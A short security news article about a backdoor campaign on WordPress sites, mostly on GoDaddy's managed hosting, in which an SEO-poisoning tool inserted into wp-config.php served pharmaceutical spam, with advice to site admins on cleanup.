Security researchers have observed an increase in backdoor infections on WordPress websites. Most of the sites are hosted on GoDaddy's Managed WordPress service and targeted with identical backdoor payloads.
The backdooring of sites
The observation was first disclosed by Wordfence, whose team spotted the malicious activity on March 11.
About 298 websites were backdoored within 24 hours, of which 281 were hosted on GoDaddy.
The backdoor infections affected internet service resellers such as tsoHost, MediaTemple, Domain Factory, 123Reg, Host Europe Managed WordPress, and Heart Internet.
The backdoor payload is a 2015 Google search SEO-poisoning tool inserted at wp-config[.]php to get spam link templates from the C2 used for injecting malicious pages into search results.
The intrusion vector hasn't been uncovered yet, although researchers suspect a supply chain attack.
How does the attack work?
The campaign served predominately pharmaceutical spam templates to visitors of the compromised websites instead of the real content.
The aim of these templates is to lure victims into purchasing fake products, and they lose money and payment details.
Researchers say, such an attack is challenging to identify and block from the user's side because it's happening on the server-side and not on the browser. Thus, local internet security tools failed to detect any malicious action.
Conclusion
Cybercriminals never miss a chance for possible exploitation of websites to achieve their nefarious goals. Website admins and owners using GoDaddy's platform should scan the wp-config[.]php file for backdoor injections. Further, admins are suggested to remove the backdoor and spam search engine results.